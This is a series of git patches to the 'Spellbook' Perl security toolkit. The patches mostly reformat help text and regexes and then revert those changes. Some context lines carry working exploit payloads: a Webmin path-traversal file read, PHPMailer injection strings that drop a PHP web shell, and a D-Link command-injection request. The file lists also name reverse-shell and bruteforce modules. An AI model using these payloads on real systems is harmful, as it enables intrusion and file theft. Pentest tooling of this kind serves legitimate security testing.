"$target/sitemap.xml"; } my $userAgent = Spellbook::Core::UserAgent -> new(); @@ -33,16 +33,19 @@ package Spellbook::Parser::Sitemap { } } } - + return @result; } if ($help) { - return " - \rParser::Sitemap - \r===================== - \r-h, --help See this menu - \r-t, --target \n\n"; + return<<"EOT"; + +Parser::Sitemap +===================== +-h, --help See this menu +-t, --target \n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Platform/HackerOne.pm b/lib/Spellbook/Platform/HackerOne.pm index 003a6a6..739fa84 100644 --- a/lib/Spellbook/Platform/HackerOne.pm +++ b/lib/Spellbook/Platform/HackerOne.pm @@ -18,7 +18,7 @@ package Spellbook::Platform::HackerOne { ); my $token = Spellbook::Core::Credentials -> new(["--platform" => "hackerone"]); - + if ($token && $target) { my $useragent = Spellbook::Core::UserAgent -> new(); my $api_url = "https://api.hackerone.com/v1/hackers/programs/$target"; @@ -35,7 +35,7 @@ package Spellbook::Platform::HackerOne { for my $scope (@{$data -> {"relationships"} -> {"structured_scopes"} -> {"data"}}) { if (($scope -> {"attributes"} -> {"asset_type"} eq "URL") && ($scope -> {"attributes"} -> {"eligible_for_bounty"})) { my $url = $scope -> {"attributes"} -> {"asset_identifier"}; - + push @result, Spellbook::Helper::Host_Normalization -> new(["--target" => $url]); } } @@ -45,15 +45,18 @@ package Spellbook::Platform::HackerOne { } if ($help) { - return " - \rPlatform::HackerOne - \r===================== - \r-h, --help See this menu - \r-t, --target Program handle from HackerOne\n\n"; + return<<"EOT"; + +Platform::HackerOne +===================== +-h, --help See this menu +-t, --target Program handle from HackerOne\n\n"; + +EOT } return 0; } -} +} 1; \ No newline at end of file diff --git a/lib/Spellbook/Platform/Intigriti.pm b/lib/Spellbook/Platform/Intigriti.pm index 4db7ac1..8c049c3 100644 --- a/lib/Spellbook/Platform/Intigriti.pm +++ b/lib/Spellbook/Platform/Intigriti.pm @@ -5,10 +5,13 @@ package Spellbook::Platform::Intigriti { sub new { my ($self, $parameters) = @_; - return " - \rPlatform::Intigriti - \r=================== - \rThis module is under development\n\n"; + return<<"EOT"; + +Platform::Intigriti +=================== +This module is under development\n\n"; + +EOT } } diff --git a/lib/Spellbook/Recon/DNS_Bruteforce.pm b/lib/Spellbook/Recon/DNS_Bruteforce.pm index 22c74f0..34d3a1c 100644 --- a/lib/Spellbook/Recon/DNS_Bruteforce.pm +++ b/lib/Spellbook/Recon/DNS_Bruteforce.pm @@ -22,7 +22,7 @@ package Spellbook::Recon::DNS_Bruteforce { if (@file) { foreach my $line (@file) { my $return = Spellbook::Recon::Host_Resolv -> new (["--target" => "$line.$target"]); - + if ($return) { push @result, "$line.$target"; } @@ -31,14 +31,17 @@ package Spellbook::Recon::DNS_Bruteforce { return @result; } - + if ($help) { - return " - \rRecon::DNS_Bruteforce - \r===================== - \r-h, --help See this menu - \r-t, --target Set a domain as a target - \r-f, --file Define a wordlist\n\n"; + return<<"EOT"; + +Recon::DNS_Bruteforce +===================== +-h, --help See this menu +-t, --target Set a domain as a target +-f, --file Define a wordlist\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Detect_Error.pm b/lib/Spellbook/Recon/Detect_Error.pm index 56ce245..987405d 100644 --- a/lib/Spellbook/Recon/Detect_Error.pm +++ b/lib/Spellbook/Recon/Detect_Error.pm @@ -16,7 +16,7 @@ package Spellbook::Recon::Detect_Error { if ($target) { $target =~ s/^http(s)?:\/\///x; - + my $resolv = Net::DNS::Resolver -> new(); my $reply = $resolv -> search($target); @@ -30,7 +30,7 @@ package Spellbook::Recon::Detect_Error { if ($request -> code() == 404) { push @results, $target; - } + } } } } @@ -39,11 +39,14 @@ package Spellbook::Recon::Detect_Error { } if ($help) { - return " - \rChecker - \r============== - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; + return<<"EOT"; + +Checker +============== +-h, --help See this menu +-t, --target Define a target\n\n"; + +EOT } } } diff --git a/lib/Spellbook/Recon/Dorking.pm b/lib/Spellbook/Recon/Dorking.pm index a3bbd8a..1302d64 100644 --- a/lib/Spellbook/Recon/Dorking.pm +++ b/lib/Spellbook/Recon/Dorking.pm @@ -20,11 +20,13 @@ package Spellbook::Recon::Dorking { } if ($help) { - return " - \rRecon::Dorking - \r===================== - \r-h, --help See this menu - \r \n\n"; + return<<"EOT"; + +Recon::Dorking +===================== +-h, --help See this menu\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Extract_Links.pm b/lib/Spellbook/Recon/Extract_Links.pm index 3fb8bde..46b6c1a 100755 --- a/lib/Spellbook/Recon/Extract_Links.pm +++ b/lib/Spellbook/Recon/Extract_Links.pm @@ -22,7 +22,7 @@ package Spellbook::Recon::Extract_Links { ssl_opts => { verify_hostname => 0 } ); - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } @@ -30,12 +30,12 @@ package Spellbook::Recon::Extract_Links { my $request = $mech -> get($target); my @links = $mech -> links(); - + for my $link (@links) { my $url = $link -> url(); - if (($url) && ($url !~ m/#/x) && ($url !~ /^http(s)?:\/\//x)) { - if ($url !~ /^\//x) { + if (($url) && ($url !~ m/#/x) && ($url !~ /^http(?:s)?:\/\//x)) { + if ($url !~ /^\//x) { $url = "/" . $url; } @@ -57,12 +57,15 @@ package Spellbook::Recon::Extract_Links { } if ($help) { - return " - \rRecon::Extrac_Links - \r===================== - \r-h, --help See this menu - \r-t, --target Define a web page to extract all links - \r-d, --deep Draft recursive function\n\n"; + return<<"EOT"; + +Recon::Extrac_Links +===================== +-h, --help See this menu +-t, --target Define a web page to extract all links +-d, --deep Draft recursive function\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Find_Emails.pm b/lib/Spellbook/Recon/Find_Emails.pm index f1d9a38..21674e0 100644 --- a/lib/Spellbook/Recon/Find_Emails.pm +++ b/lib/Spellbook/Recon/Find_Emails.pm @@ -30,15 +30,18 @@ package Spellbook::Recon::Find_Emails { } return @result; - } + } } if ($help) { - return " - \rRecon::Find_Emails - \r===================== - \r-h, --help See this menu - \r-t, --target Define a domain to find emails\n"; + return<<"EOT"; + +Recon::Find_Emails +===================== +-h, --help See this menu +-t, --target Define a domain to find emails\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Get_IP.pm b/lib/Spellbook/Recon/Get_IP.pm index e6eb2ad..e3f8533 100644 --- a/lib/Spellbook/Recon/Get_IP.pm +++ b/lib/Spellbook/Recon/Get_IP.pm @@ -22,15 +22,18 @@ package Spellbook::Recon::Get_IP { if ($ip) { return inet_ntoa($ip); - } + } } if ($help) { - return " - \rRecon::Get_IP - \r===================== - \r-h, --help See this menu - \r-t, --target Set a domain to get the IP\n\n"; + return<<"EOT"; + +Recon::Get_IP +===================== +-h, --help See this menu +-t, --target Set a domain to get the IP\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/HTTP_Probe.pm b/lib/Spellbook/Recon/HTTP_Probe.pm index 49e9467..ee5e606 100644 --- a/lib/Spellbook/Recon/HTTP_Probe.pm +++ b/lib/Spellbook/Recon/HTTP_Probe.pm @@ -14,14 +14,14 @@ package Spellbook::Recon::HTTP_Probe { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "http://$target"; } my $userAgent = Spellbook::Core::UserAgent -> new(); my $response = $userAgent -> get($target); - if ($response -> code() != 500) { + if ($response -> code() != 500) { push @result, $target; } @@ -29,11 +29,14 @@ package Spellbook::Recon::HTTP_Probe { } if ($help) { - return " - \rRecon::HTTP_Probe - \r===================== - \r-h, --help See this menu - \r-t, --target Define a target to make a HTTP request probe\n\n"; + return<<"EOT"; + +Recon::HTTP_Probe +===================== +-h, --help See this menu +-t, --target Define a target to make a HTTP request probe\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/HaveBeenPwned.pm b/lib/Spellbook/Recon/HaveBeenPwned.pm index b2c5adf..1621406 100644 --- a/lib/Spellbook/Recon/HaveBeenPwned.pm +++ b/lib/Spellbook/Recon/HaveBeenPwned.pm @@ -6,7 +6,7 @@ package Spellbook::Recon::HaveBeenPwned { use Spellbook::Core::Credentials; # THIS IS A DRAFT MODULE - + sub new { my ($self, $parameters) = @_; my ($help, $target); @@ -33,11 +33,14 @@ package Spellbook::Recon::HaveBeenPwned { } if ($help) { - return " - \rRecon::HaveBeenPwned - \r==================== - \r-h, --help See this menu - \r-e, --target Define an e-mail address as a target\n\n"; + return<<"EOT"; + +Recon::HaveBeenPwned +==================== +-h, --help See this menu +-e, --target Define an e-mail address as a target\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Host_Resolv.pm b/lib/Spellbook/Recon/Host_Resolv.pm index 7a79ac0..8de4dde 100644 --- a/lib/Spellbook/Recon/Host_Resolv.pm +++ b/lib/Spellbook/Recon/Host_Resolv.pm @@ -23,15 +23,18 @@ package Spellbook::Recon::Host_Resolv { if ($search) { return $target; - } + } } - + if ($help) { - return " - \rRecon::Host_Resolv - \r===================== - \r-h, --help See this menu - \r-t, --target Set a domain to get the IP\n\n"; + return<<"EOT"; + +Recon::Host_Resolv +===================== +-h, --help See this menu +-t, --target Set a domain to get the IP\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Internal_DNS.pm b/lib/Spellbook/Recon/Internal_DNS.pm index 9dabb96..79a3622 100644 --- a/lib/Spellbook/Recon/Internal_DNS.pm +++ b/lib/Spellbook/Recon/Internal_DNS.pm @@ -26,11 +26,14 @@ package Spellbook::Recon::Internal_DNS { } if ($help) { - return " - \rRecon::Internal_DNS - \r===================== - \r-h, --help See this menu - \r-t, --target Set a domain to get the IP\n\n"; + return<<"EOT"; + +Recon::Internal_DNS +===================== +-h, --help See this menu +-t, --target Set a domain to get the IP\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Masscan.pm b/lib/Spellbook/Recon/Masscan.pm index 205742c..d460388 100644 --- a/lib/Spellbook/Recon/Masscan.pm +++ b/lib/Spellbook/Recon/Masscan.pm @@ -5,11 +5,11 @@ package Spellbook::Recon::Masscan { use List::MoreUtils qw(uniq); use Spellbook::Recon::Get_IP; use Spellbook::Helper::CDN_Checker; - + sub new { my ($self, $parameters) = @_; my ($help, @target, @ports, @result, $skip_cdn); - + my @arguments = qw(--banners); Getopt::Long::GetOptionsFromArray ( @@ -19,7 +19,7 @@ package Spellbook::Recon::Masscan { "p|port=s" => \@ports, "a|arguments" => \@arguments, "skip-cdn" => \$skip_cdn - ); + ); if (@target) { if (!@ports) { @ports = "1-65535"; } @@ -28,7 +28,7 @@ package Spellbook::Recon::Masscan { my $CDN_Checker = Spellbook::Helper::CDN_Checker -> new (["--target" => $target[0]]); if ($CDN_Checker) { - return 0; + return 0; } } @@ -45,23 +45,26 @@ package Spellbook::Recon::Masscan { if ($scan) { my $result = $masscan -> scan_results(); - foreach my $value (@{$result -> {"scan_results"}}) { + foreach my $value (@{$result -> {"scan_results"}}) { push @result, $target[0] . ":" . $value -> {"ports"} -> [0] -> {"port"}; } - + return uniq @result; } - } + } if ($help) { - return " - \rRecon::Masscan - \r===================== - \r-h, --help See this menu - \r-t, --target Set an Domain/IP to make a port scanning using masscan - \r-p, --ports Define ports to scan - \r-a, --arguments Parameters to masscanner - \r--skip-cdn Skip the CDN check\n\n"; + return<<"EOT"; + +Recon::Masscan +===================== +-h, --help See this menu +-t, --target Set an Domain/IP to make a port scanning using masscan +-p, --ports Define ports to scan +-a, --arguments Parameters to masscanner +--skip-cdn Skip the CDN check\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Nmap_Scanner.pm b/lib/Spellbook/Recon/Nmap_Scanner.pm index 23ea636..15278ad 100644 --- a/lib/Spellbook/Recon/Nmap_Scanner.pm +++ b/lib/Spellbook/Recon/Nmap_Scanner.pm @@ -2,28 +2,28 @@ package Spellbook::Recon::Nmap_Scanner { use strict; use warnings; use Nmap::Scanner; # https://metacpan.org/pod/Nmap::Scanner - + sub scan_started { my $self = shift; my $host = shift; - + my $hostname = $host -> hostname(); my $addresses = join(',', map {$_ -> addr()} $host -> addresses()); my $status = $host -> status(); - + print "$hostname ($addresses) is $status\n"; return 0; } - + sub port_found { my $self = shift; my $host = shift; my $port = shift; - + my $name = $host->hostname(); my $addresses = join(',', map {$_ -> addr()} $host -> addresses()); - + print "On host $name ($addresses), found ", $port->state()," port ", join('/', $port -> protocol(), $port -> portid()), "\n"; @@ -48,20 +48,23 @@ package Spellbook::Recon::Nmap_Scanner { $scanner -> register_scan_started_event(\&scan_started); $scanner -> register_port_found_event(\&port_found); $scanner -> scan("-sS -p 1-1024 -O $target"); - + my $results = $scanner -> scan(); # print Dumper($results); return @result; - } + } if ($help) { - return " - \rRecon::Nmap_Scanner - \r===================== - \r-h, --help See this menu - \r-t, --target Set an IP to run the scanner\n\n"; + return<<"EOT"; + +Recon::Nmap_Scanner +===================== +-h, --help See this menu +-t, --target Set an IP to run the scanner\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Query_Shodan.pm b/lib/Spellbook/Recon/Query_Shodan.pm index b4453c2..0b109b0 100644 --- a/lib/Spellbook/Recon/Query_Shodan.pm +++ b/lib/Spellbook/Recon/Query_Shodan.pm @@ -24,7 +24,7 @@ package Spellbook::Recon::Query_Shodan { if ($httpCode == 200) { my $content = decode_json($request -> content()); - + foreach my $data (@{$content -> {"matches"}}) { my $hostname = $data -> {"ip_str"}; my $port = $data -> {"port"}; @@ -37,11 +37,14 @@ package Spellbook::Recon::Query_Shodan { } if ($help) { - return " - \rRecon::Shodan - \r===================== - \r-h, --help See this menu - \r-t, --query Define a query\n\n"; + return<<"EOT"; + +Recon::Shodan +===================== +-h, --help See this menu +-t, --query Define a query\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Shodan_Enumeration.pm b/lib/Spellbook/Recon/Shodan_Enumeration.pm index d8edb03..bd02dae 100644 --- a/lib/Spellbook/Recon/Shodan_Enumeration.pm +++ b/lib/Spellbook/Recon/Shodan_Enumeration.pm @@ -21,7 +21,7 @@ package Spellbook::Recon::Shodan_Enumeration { if ($target =~ /^http(s)?:\/\//x) { $target =~ s/^http(s)?:\/\///x; } - + my $validate = is_domain($target); if ($validate) { @@ -61,11 +61,14 @@ package Spellbook::Recon::Shodan_Enumeration { } if ($help) { - return " - \rRecon::Shodan_Enum - \r===================== - \r-h, --help See this menu - \r-t, --target Set an IP to see infos on shodan API\n\n"; + return<<"EOT"; + +Recon::Shodan_Enum +===================== +-h, --help See this menu +-t, --target Set an IP to see infos on shodan API\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Subdomain_Enumeration.pm b/lib/Spellbook/Recon/Subdomain_Enumeration.pm index 1d06c66..2bcd126 100644 --- a/lib/Spellbook/Recon/Subdomain_Enumeration.pm +++ b/lib/Spellbook/Recon/Subdomain_Enumeration.pm @@ -5,7 +5,7 @@ package Spellbook::Recon::Subdomain_Enumeration { use List::MoreUtils qw(uniq); use Spellbook::Core::UserAgent; use Spellbook::Core::Credentials; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -50,14 +50,17 @@ package Spellbook::Recon::Subdomain_Enumeration { } return uniq @result; - } + } if ($help) { - return " - \rRecon::Subdomain_Enumeration - \r===================== - \r-h, --help See this menu - \r-t, --target Find subdomains from a target using SecurityTrails\n\n"; + return<<"EOT"; + +Recon::Subdomain_Enumeration +===================== +-h, --help See this menu +-t, --target Find subdomains from a target using SecurityTrails\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Recon/Technologies.pm b/lib/Spellbook/Recon/Technologies.pm index 0801727..1f411df 100644 --- a/lib/Spellbook/Recon/Technologies.pm +++ b/lib/Spellbook/Recon/Technologies.pm @@ -16,7 +16,7 @@ package Spellbook::Recon::Technologies { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } @@ -36,11 +36,14 @@ package Spellbook::Recon::Technologies { } if ($help) { - return " - \rRecon::Detect_Tech - \r===================== - \r-t, --target Define the target - \r-h, --help See this menu\n\n"; + return<<"EOT"; + +Recon::Detect_Tech +===================== +-t, --target Define the target +-h, --help See this menu\n\n"; + +EOT } return 1; diff --git a/lib/Spellbook/Recon/WayBackUrls.pm b/lib/Spellbook/Recon/WayBackUrls.pm index ffce702..d78d397 100644 --- a/lib/Spellbook/Recon/WayBackUrls.pm +++ b/lib/Spellbook/Recon/WayBackUrls.pm @@ -3,7 +3,7 @@ package Spellbook::Recon::WayBackUrls { use warnings; use JSON; use Spellbook::Core::UserAgent; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -14,11 +14,11 @@ package Spellbook::Recon::WayBackUrls { "t|target=s" => \$target ); - if ($target) { + if ($target) { my $endpoint = "http://web.archive.org/cdx/search/cdx?url=$target/*&output=json&collapse=urlkey"; my $userAgent = Spellbook::Core::UserAgent -> new(); my $request = $userAgent -> get($endpoint); - + if (($request -> code() == 200) && ($request -> content ne "[]")) { my $content = decode_json($request -> content); @@ -33,11 +33,14 @@ package Spellbook::Recon::WayBackUrls { } if ($help) { - return " - \rRecon::WaybackUrls - \r===================== - \r-h, --help See this menu - \r-t, --target Set an website to see paths from WayBackMachine\n"; + return<<"EOT"; + +Recon::WaybackUrls +===================== +-h, --help See this menu +-t, --target Set an website to see paths from WayBackMachine\n"; + +EOT } return 0; diff --git a/spellbook.pl b/spellbook.pl index fcef7a0..b1792da 100755 --- a/spellbook.pl +++ b/spellbook.pl @@ -11,7 +11,7 @@ sub main { my ($search, $module, @result); - + Getopt::Long::GetOptions ( "s|search=s" => \$search, "m|module=s" => \$module @@ -25,6 +25,8 @@ sub main { } return Spellbook::Core::Helper -> new() unless $search || $module; + + return 0; } main(); \ No newline at end of file From 73d718af2d1aa7e476cf8787651d2baa6ef8f978 Mon Sep 17 00:00:00 2001 From: htrgouvea <hi@heitorgouvea.me> Date: Tue, 3 Dec 2024 16:19:41 +0000 Subject: [PATCH 17/17] Revert "address linter warnings (#113)" This reverts commit dcac3a4215c1b538cf36f4ac50ee416ed2728569. --- lib/Spellbook/Advisory/CVE_2006_3392.pm | 27 ++--- lib/Spellbook/Advisory/CVE_2016_10045.pm | 27 ++--- lib/Spellbook/Advisory/CVE_2017_5487.pm | 25 ++--- lib/Spellbook/Advisory/CVE_2020_9376.pm | 17 ++- lib/Spellbook/Advisory/CVE_2020_9377.pm | 23 ++-- lib/Spellbook/Advisory/CVE_2021_24891.pm | 15 +-- lib/Spellbook/Advisory/CVE_2021_41773.pm | 23 ++-- lib/Spellbook/Advisory/CVE_2023_29489.pm | 21 ++-- lib/Spellbook/Advisory/CVE_2023_38646.pm | 35 +++--- lib/Spellbook/Advisory/CVE_2024_4040.pm | 33 +++--- .../Advisory/Laravel_Ignition_XSS.pm | 19 ++-- lib/Spellbook/Android/APKSign.pm | 19 ++-- lib/Spellbook/Android/Manifest.pm | 28 ++--- lib/Spellbook/Android/Strings.pm | 13 +-- lib/Spellbook/Bruteforce/Facebook.pm | 15 +-- lib/Spellbook/Bruteforce/Instagram.pm | 17 ++- .../Bruteforce/{LinkedIn.pm => Linkedin.pm} | 15 +-- lib/Spellbook/Bruteforce/SMTP.pm | 13 +-- lib/Spellbook/Bruteforce/Twitter.pm | 15 +-- lib/Spellbook/Bruteforce/Wordpress.pm | 21 ++-- lib/Spellbook/Core/Credentials.pm | 21 ++-- lib/Spellbook/Core/Helper.pm | 23 ++-- lib/Spellbook/Core/Module.pm | 27 ++--- lib/Spellbook/Core/Orchestrator.pm | 33 +++--- lib/Spellbook/Exploit/CORS_Misconfig.pm | 19 ++-- lib/Spellbook/Exploit/DataBreach.pm | 17 ++- lib/Spellbook/Exploit/Django_DEBUG.pm | 19 ++-- lib/Spellbook/Exploit/Fullchain_DLINK.pm | 35 +++--- lib/Spellbook/Exploit/HAProxy_Exposed.pm | 17 ++- lib/Spellbook/Exploit/Headers_Misconfig.pm | 17 ++- lib/Spellbook/Exploit/Mixed_Content.pm | 26 ++--- lib/Spellbook/Exploit/None_Attack.pm | 17 ++- lib/Spellbook/Exploit/Pwn_DB.pm | 22 ++-- lib/Spellbook/Exploit/Redis_Unauth.pm | 23 ++-- lib/Spellbook/Exploit/Reflected_XSS.pm | 17 ++- lib/Spellbook/Exploit/S3_Bucket_Takeover.pm | 17 ++- lib/Spellbook/Exploit/Shellshock.pm | 17 ++- lib/Spellbook/Exploit/Subdomain_Takeover.pm | 104 +++++++++--------- lib/Spellbook/Exploit/Swagger_XSS.pm | 98 +++++++++-------- lib/Spellbook/Exploit/Upload_Via_PUT.pm | 15 +-- lib/Spellbook/Helper/CDN_Checker.pm | 74 +++++++------ lib/Spellbook/Helper/Exifs_Write.pm | 15 +-- lib/Spellbook/Helper/Generate_UUID.pm | 19 ++-- lib/Spellbook/Helper/Host_Normalization.pm | 15 +-- lib/Spellbook/Helper/Permutations.pm | 21 ++-- lib/Spellbook/Helper/Read_File.pm | 41 ++++--- lib/Spellbook/Helper/Reverse_Shell.pm | 21 ++-- lib/Spellbook/Helper/Scope.pm | 29 +++-- lib/Spellbook/Helper/Uniq.pm | 13 +-- lib/Spellbook/Parser/Nmap.pm | 23 ++-- lib/Spellbook/Parser/Nozaki.pm | 13 +-- lib/Spellbook/Parser/S3_Bucket.pm | 21 ++-- lib/Spellbook/Parser/Sitemap.pm | 17 ++- lib/Spellbook/Platform/HackerOne.pm | 19 ++-- lib/Spellbook/Platform/Intigriti.pm | 11 +- lib/Spellbook/Recon/DNS_Bruteforce.pm | 19 ++-- lib/Spellbook/Recon/Detect_Error.pm | 17 ++- lib/Spellbook/Recon/Dorking.pm | 12 +- lib/Spellbook/Recon/Extract_Links.pm | 23 ++-- lib/Spellbook/Recon/Find_Emails.pm | 15 +-- lib/Spellbook/Recon/Get_IP.pm | 15 +-- lib/Spellbook/Recon/HTTP_Probe.pm | 17 ++- lib/Spellbook/Recon/HaveBeenPwned.pm | 15 +-- lib/Spellbook/Recon/Host_Resolv.pm | 17 ++- lib/Spellbook/Recon/Internal_DNS.pm | 13 +-- lib/Spellbook/Recon/Masscan.pm | 33 +++--- lib/Spellbook/Recon/Nmap_Scanner.pm | 29 +++-- lib/Spellbook/Recon/Query_Shodan.pm | 15 +-- lib/Spellbook/Recon/Shodan_Enumeration.pm | 15 +-- lib/Spellbook/Recon/Subdomain_Enumeration.pm | 17 ++- lib/Spellbook/Recon/Technologies.pm | 15 +-- lib/Spellbook/Recon/WayBackUrls.pm | 19 ++-- spellbook.pl | 4 +- 73 files changed, 725 insertions(+), 942 deletions(-) rename lib/Spellbook/Bruteforce/{LinkedIn.pm => Linkedin.pm} (68%) diff --git a/lib/Spellbook/Advisory/CVE_2006_3392.pm b/lib/Spellbook/Advisory/CVE_2006_3392.pm index 90f5e12..211e06a 100644 --- a/lib/Spellbook/Advisory/CVE_2006_3392.pm +++ b/lib/Spellbook/Advisory/CVE_2006_3392.pm @@ -2,7 +2,7 @@ package Spellbook::Advisory::CVE_2006_3392 { use strict; use warnings; use Spellbook::Core::UserAgent; - + sub new { my ($self, $parameters) = @_; my ($help, $target, $file); @@ -15,27 +15,24 @@ package Spellbook::Advisory::CVE_2006_3392 { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } - + my $userAgent = Spellbook::Core::UserAgent -> new(); my $temp = "/..%01" x 40; my $request = $userAgent -> get($target . "/unauthenticated/" . $temp . $file); - - return $request -> content(); - } + + return $request -> content(); + } if ($help) { - return <<"EOT"; - -Exploit::CVE_2006_3392 -======================= --h, --help See this menu --t, --target Define a target --f, --file Define a file to read - -EOT + return " + \rExploit::CVE_2006_3392 + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target + \r-f, --file Define a file to read\n\n"; } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2016_10045.pm b/lib/Spellbook/Advisory/CVE_2016_10045.pm index a53742f..6c7a61f 100644 --- a/lib/Spellbook/Advisory/CVE_2016_10045.pm +++ b/lib/Spellbook/Advisory/CVE_2016_10045.pm @@ -7,7 +7,7 @@ package Spellbook::Advisory::CVE_2016_10045 { sub new { my ($self, $parameters) = @_; my ($help, $target, @results); - + my $dir = "/var/www/html/uploads"; my %shell = ( "name" => "spellbook_xpl.php", @@ -21,9 +21,9 @@ package Spellbook::Advisory::CVE_2016_10045 { "S|shell=s" => \$shell{name}, "d|directory=s" => \$dir ); - + if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } @@ -34,10 +34,10 @@ package Spellbook::Advisory::CVE_2016_10045 { $shell{code} = $code -> slurp(); } - + my $CVE_2016_10033 = "\"attacker\\\" -oQ/tmp/ -X$dir/$shell{name} some\"\@email.com"; my $CVE_2016_10045 = "\"attacker\\' -oQ/tmp/ -X$dir/$shell{name} some\"\@email.com"; - + try { my $request = $userAgent -> post($target, [ "action" => "send", @@ -62,16 +62,13 @@ package Spellbook::Advisory::CVE_2016_10045 { } if ($help) { - return<<"EOT"; - -Exploit::CVE_2016_10045 -======================= --h, --help See this menu --t, --target Define a target --S, --shell --d, --directory \n\n"; - -EOT + return " + \rExploit::CVE_2016_10045 + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target + \r-S, --shell + \r-d, --directory \n\n"; } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2017_5487.pm b/lib/Spellbook/Advisory/CVE_2017_5487.pm index 4d2f6f3..c10b3eb 100755 --- a/lib/Spellbook/Advisory/CVE_2017_5487.pm +++ b/lib/Spellbook/Advisory/CVE_2017_5487.pm @@ -15,11 +15,11 @@ package Spellbook::Advisory::CVE_2017_5487 { "t|target=s" => \$target ); - if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target) { + if ($target !~ /^http(s)?:\/\//x) { $target = "http://$target"; } - + my $userAgent = Spellbook::Core::UserAgent -> new(); my $request = $userAgent -> get("$target/wp-json/wp/v2/users"); @@ -29,11 +29,11 @@ package Spellbook::Advisory::CVE_2017_5487 { foreach my $data (@$content) { my $username = $data -> {slug}; - + if ($username) { push @result, $username; } - } + } }; return @result; @@ -42,17 +42,14 @@ package Spellbook::Advisory::CVE_2017_5487 { } if ($help) { - return<<"EOT"; - -Exploit::CVE_2017_5487 -======================= --h, --help See this menu -r-t, --target Define a target\n\n"; - -EOT + return " + \rExploit::CVE_2017_5487 + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target\n\n"; } - return 0; + return 0; } } diff --git a/lib/Spellbook/Advisory/CVE_2020_9376.pm b/lib/Spellbook/Advisory/CVE_2020_9376.pm index a07175f..2eb317d 100644 --- a/lib/Spellbook/Advisory/CVE_2020_9376.pm +++ b/lib/Spellbook/Advisory/CVE_2020_9376.pm @@ -3,7 +3,7 @@ package Spellbook::Advisory::CVE_2020_9376 { use warnings; use Mojo::DOM; use Spellbook::Core::UserAgent; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @results); @@ -15,7 +15,7 @@ package Spellbook::Advisory::CVE_2020_9376 { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "http://$target"; } @@ -38,14 +38,11 @@ package Spellbook::Advisory::CVE_2020_9376 { } if ($help) { - return<<"EOT"; - -Advisory::CVE_2020_9376 -======================= --h, --help See this menu --t, --target Define a target to exploit\n\n"; - -EOT + return " + \rAdvisory::CVE_2020_9376 + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target to exploit\n\n"; } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2020_9377.pm b/lib/Spellbook/Advisory/CVE_2020_9377.pm index d5349b8..5cac0b5 100644 --- a/lib/Spellbook/Advisory/CVE_2020_9377.pm +++ b/lib/Spellbook/Advisory/CVE_2020_9377.pm @@ -2,7 +2,7 @@ package Spellbook::Advisory::CVE_2020_9377 { use strict; use warnings; use Spellbook::Core::UserAgent; - + sub new { my ($self, $parameters) = @_; my ($help, $target, $cookie, $command, @results); @@ -16,13 +16,13 @@ package Spellbook::Advisory::CVE_2020_9377 { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "http://$target"; } my $userAgent = Spellbook::Core::UserAgent -> new(); my $payload = "cmd=$command"; - + my $headers = HTTP::Headers -> new ( "Content-Type" => "application/x-www-form-urlencoded", "Cookie" => "uid=$cookie" @@ -39,16 +39,13 @@ package Spellbook::Advisory::CVE_2020_9377 { } if ($help) { - return<<"EOT"; - -Advisory::CVE_2020_9377 -======================= --h, --help See this menu --t, --target Define a target --c, --cookie Define a session cookie --p, --payload Set the command to run on the target\n\n"; - -EOT + return " + \rAdvisory::CVE_2020_9377 + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target + \r-c, --cookie Define a session cookie + \r-p, --payload Set the command to run on the target\n\n"; } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2021_24891.pm b/lib/Spellbook/Advisory/CVE_2021_24891.pm index f3197ea..ee0d49f 100644 --- a/lib/Spellbook/Advisory/CVE_2021_24891.pm +++ b/lib/Spellbook/Advisory/CVE_2021_24891.pm @@ -14,7 +14,7 @@ package Spellbook::Advisory::CVE_2021_24891 { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } @@ -44,14 +44,11 @@ package Spellbook::Advisory::CVE_2021_24891 { } if ($help) { - return<<"EOT"; - -Advisory::CVE_2021_24891 -======================= --h, --help See this menu --t, --target Define a target\n\n"; - -EOT + return " + \rAdvisory::CVE_2021_24891 + \r======================= + \r-h, --help 